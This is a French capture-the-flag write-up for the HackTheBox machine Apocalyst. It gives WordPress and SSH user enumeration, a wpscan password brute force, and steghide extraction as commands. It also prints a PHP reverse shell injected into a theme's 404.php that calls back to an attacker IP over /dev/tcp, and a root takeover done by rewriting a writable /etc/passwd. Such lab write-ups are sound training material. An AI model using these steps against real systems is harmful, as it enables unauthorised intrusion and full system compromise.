Apocalyst HackTheBox (Writeup)

Skills:

Wordpress Enumeration
Image Stego Challenge - Steghide
Information Leakage - User Enumeration
WordPress Exploitation - Theme Editor [RCE]
Abusing misconfigured permissions [Privilege Escalation]

Reconnaissance

Création de l'espace de travail :

Nous établirons notre espace de travail en créant trois dossiers pour stocker les contenus importants, les exploits et les résultats de la reconnaissance à l'aide de Nmap.

Vérification de la Connectivité VPN

Vérification de la connexion VPN pour assurer une communication stable avec la machine cible.

Recherche des ports ouverts avec Nmap :

Exploration des ports ouverts et exportation dans le fichier "allPorts" dans le répertoire Nmap:

nmap -p- --open -sS -n -Pn --min-rate 5000 -vvv 10.10.10.46 -oG allPorts

Scan de la version des ports avec Nmap (22,80):

Utilisation de Nmap pour scanner la version des ports et extraction des informations dans le fichier "targeted" :

nmap -sCV -p22,80 10.10.10.46 -oN targeted

Nous détectons un site WordPress, mais la résolution de domaine est mal configurée.

Nous ajoutons l'entrée suivante dans /etc/hosts :

Exploration du site WordPress

Identification d'un utilisateur valide

Nous trouvons un utilisateur valide : falaraki.

Exploitation de SSH

Étant donné que la version de SSH est obsolète, nous pouvons utiliser un exploit pour valider l'utilisateur sur le système :

searchsploit -m linux/remote/45939.py

Validation de l'existence de l'utilisateur :

python2 ssh_enumeration.py 10.10.10.46 falaraki 2>/dev/null

Ainsi pour wordpress:

Énumération de WordPress

Nous utilisons wfuzz pour rechercher des répertoires intéressants :

wfuzz -u http://apocalyst.htb/FUZZ -w /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt --hc=404 -t 200 -L

Ce scan détecte plusieurs pages retournant un code 301, redirigeant vers une image.

Nous filtrons ensuite par la longueur du texte (157) :

wfuzz -u http://apocalyst.htb/FUZZ --hh=157 -w /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt --hc=404 -t 200 -L

Aucun résultat intéressant.

Création Dictionnaire personnalisé - CEWL

Nous générons un dictionnaire basé sur le site web :

Utilisez Cewl pour générer un dictionnaire basé sur le site web :

cewl -w list.txt http://apocalyst.htb/

Nouvelle reconnaissance avec wfuzz :

wfuzz -u http://apocalyst.htb/FUZZ -w list.txt --hh=157 --hc=404 -t 200 -L

Nous trouvons le répertoire Rightiousness.

Analyse de stéganographie avec Steghide

Nous enregistrons l'image et l’analysons :

Vérification si l’image contient des données cachées :

Vérification si l’image contient des données cachées :

steghide info image.jpg

Extraction des données cachées :

steghide extract -sf image.jpg

Un fichier list.txt contenant des mots est généré

Attaque par force brute sur WordPress

Manual Brute Force (xmlrpc.php)

Nous lançons une attaque brute-force avec wpscan, en exploitant xmlrpc.php qui est actif :

wpscan --url http://apocalyst.htb -U falaraki -P list.txt

Nous trouvons le mot de passe de falaraki : Transclisiation.

Exploitation de WordPress - Remote Code Execution (RCE)

Nous modifions le fichier 404.php et y injectons un shell inversé :

<?php
system("bash -c 'bash -i >& /dev/tcp/10.10.14.50/443 0>&1'")
?>

Mise en écoute sur le port 443 :

nc -nvlp 443

Exécution du shell via curl :

curl -s -X GET "http://apocalyst.htb/?p=404.php"

Amélioration de la session shell :

script /dev/null -c bash
#contrôle Z

stty raw -echo; fg
reset xterm
export TERM=xterm
export SHELL=bash
stty rows 44 columns 184

Flag user.txt :)

Élévation de privilèges

Gestion des droits (/etc/passwd)

find / -writable 2>/dev/null | grep -vE "/dev|tmp|var|run|lib|proc|sys"

Nous constatons que /etc/passwd est modifiable.

Création d’un mot de passe chiffré avec OpenSSL :

openssl passwd -1 -salt WylYIBz9 jordan

Ce qui génère:

$1$WylYIBz9$3sZ.Aikcts/jZIpgmvnck/

Nous remplaçons la ligne root dans /etc/passwd avec notre hash.

Connexion en tant que root :

Flag root.txt :)

Mis à jour il y a 1 an

hashtagReconnaissance

hashtagExploration du site WordPress

hashtagIdentification d'un utilisateur valide

hashtagExploitation de SSH

hashtagAinsi pour wordpress:

hashtagÉnumération de WordPress

hashtagCréation Dictionnaire personnalisé - CEWL

hashtagAnalyse de stéganographie avec Steghide

hashtagAttaque par force brute sur WordPress

hashtagExploitation de WordPress - Remote Code Execution (RCE)

hashtagAmélioration de la session shell :

hashtagFlag user.txt :)

hashtagÉlévation de privilèges

hashtagGestion des droits (/etc/passwd)

hashtagFlag root.txt :)